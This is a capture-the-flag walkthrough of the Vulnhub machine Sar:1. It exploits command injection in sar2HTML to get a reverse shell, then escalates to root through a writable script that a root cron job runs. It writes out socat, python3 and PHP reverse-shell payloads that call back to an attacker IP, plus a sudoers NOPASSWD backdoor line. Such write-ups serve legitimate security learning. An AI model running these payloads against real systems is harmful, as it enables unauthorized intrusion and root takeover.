Sar:1 Vulnhub Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/sar1 192.168.43.166
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 22:37 EDT
Nmap scan report for 192.168.1.112
Host is up (0.0033s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:46:0D:BC (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

Only one port open. Great!

Dirb

dirb http://192.168.43.166
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 13 22:38:52 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.112/ ----
+ http://192.168.1.112/index.html (CODE:200|SIZE:10918)
+ http://192.168.1.112/phpinfo.php (CODE:200|SIZE:95475)
+ http://192.168.1.112/robots.txt (CODE:200|SIZE:9)
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)

-----------------
END_TIME: Wed May 13 22:38:57 2020
DOWNLOADED: 4612 - FOUND: 4

Reverse Shell

Let's navigate to robots.txt. It contains a single entry, sar2HTML.

Replace robots.txt with sar2HTML in the URL to reach the application.

After Googling for a while, I found a sar2HTML exploit on exploit-db.

The application hands the plot parameter to a shell without sanitising it: a semicolon terminates the intended argument, and whatever we write after it is executed as a command on the server. This is where we can supply a reverse shell and get access to the machine.

nc -nv <IP> <Port> doesn't work, so I use socat to get a reverse shell; we can also use python3 for it. Whichever payload is used, it goes after the semicolon in the plot parameter and must be URL-encoded, otherwise characters such as the & in <&3 are interpreted by the URL parser instead of reaching the shell.

Socat (10.0.3.4 is the attacking machine's IP)
Victim's machine - socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Attacking machine - socat file:`tty`,raw,echo=0 tcp-listen:4444

Python3 (10.0.0.1 is the attacking machine's IP)
Victim's machine - python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Attacking machine - nc -nlvp 1234 (the port must match the one in the payload)

We got a shell!

Navigate to the love user's home directory to get the user flag.

Privilege Escalation

After trying some methods, I found something in the crontab.

A script called finally.sh runs as root every 5 minutes.

Let's locate the file.

After that, we cat finally.sh.

Inside finally.sh we can see that it runs another script, write.sh, which sits in the same folder.

finally.sh is not writable by a normal user, but write.sh is.

Anything we append to write.sh therefore runs as root the next time the cron job fires.
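The cron check above can be done generically. The following script is an added example (not the author's own steps): it reads a crontab, extracts the scripts each job runs, follows one level into the scripts those call, and reports every file the current user can write. The demo crontab and scripts it creates are constructed to mirror the finally.sh -> write.sh chain and are not the machine's real files.

```shell
#!/bin/sh
# Added example, not from the original write-up: find cron jobs whose script,
# or a script that script calls, is writable by the current user. The demo
# files created by make_demo are constructed, not the box's real finally.sh
# and write.sh.

set -f   # never glob-expand paths extracted from cron lines (e.g. /tmp/*)

# Absolute paths on a line: stop at whitespace, shell separators and quotes.
PATH_RE='/[^[:space:];&|<>()"`]+'

# Print "<file> (from: <cron line>)" if $1 is a regular file we can write.
report_if_writable() {
    if [ -f "$1" ] && [ -w "$1" ]; then
        printf '%s (from: %s)\n' "$1" "$2"
    fi
    return 0
}

# $1 = crontab file (e.g. /etc/crontab). Skips comments, blank lines and
# variable assignments such as SHELL= or PATH=.
find_writable_cron_targets() {
    [ -r "$1" ] || { echo "cannot read $1" >&2; return 1; }
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$1" |
    while IFS= read -r line; do
        for path in $(printf '%s\n' "$line" | grep -oE "$PATH_RE"); do
            report_if_writable "$path" "$line"
            # One level down: scripts referenced inside the cron script
            [ -f "$path" ] && [ -r "$path" ] || continue
            for inner in $(grep -oE "$PATH_RE" "$path"); do
                [ "$inner" != "$path" ] || continue   # the script itself, already checked
                report_if_writable "$inner" "$line"
            done
        done
    done
}

# Constructed demo: root runs finally.sh every 5 minutes and finally.sh runs a
# world-writable write.sh. Prints the path of the generated crontab.
make_demo() {
    dir=$(mktemp -d)
    printf '#!/bin/bash\n%s/write.sh\n' "$dir" > "$dir/finally.sh"
    printf '#!/bin/bash\necho hello\n' > "$dir/write.sh"
    chmod 755 "$dir/finally.sh"
    chmod 777 "$dir/write.sh"
    printf 'SHELL=/bin/sh\n*/5 * * * * root %s/finally.sh\n' "$dir" > "$dir/crontab"
    printf '%s\n' "$dir/crontab"
}

find_writable_cron_targets "$(make_demo)"
```

On a real target run it against /etc/crontab and the files in /etc/cron.d; every line it prints is a file whose contents will eventually execute with the cron entry's privileges (root for the system crontab). If you are root already, -w is true for everything, so the output is only meaningful from the low-privilege shell.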

Method 1

Append a PHP reverse shell to write.sh. A quoted heredoc avoids the shell expanding $sock or breaking on the nested quotes; replace 10.0.0.1 with the attacking machine's IP.

cat >> write.sh <<'EOF'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
EOF

Then, on the attacking machine, set up a listener on the same port by typing

nc -lvp 1234

Wait up to 5 minutes and you will get a shell, and it is root!

Method 2

Have the root cron job add a sudo rule for www-data. The rule must use the full sudoers syntax; a malformed line such as "www-data NOPASSWD: /bin/bash" is a parse error, and sudo refuses to run anything at all while /etc/sudoers does not parse.

echo "echo 'www-data ALL=(ALL) NOPASSWD: /bin/bash' >> /etc/sudoers" >> write.sh

Wait up to 5 minutes, then type

sudo -l, and you will see that www-data can execute /bin/bash without a password, thanks to the rule we added.

sudo /bin/bash to get root!

Navigate to /root to get the flag!

Congratulations!
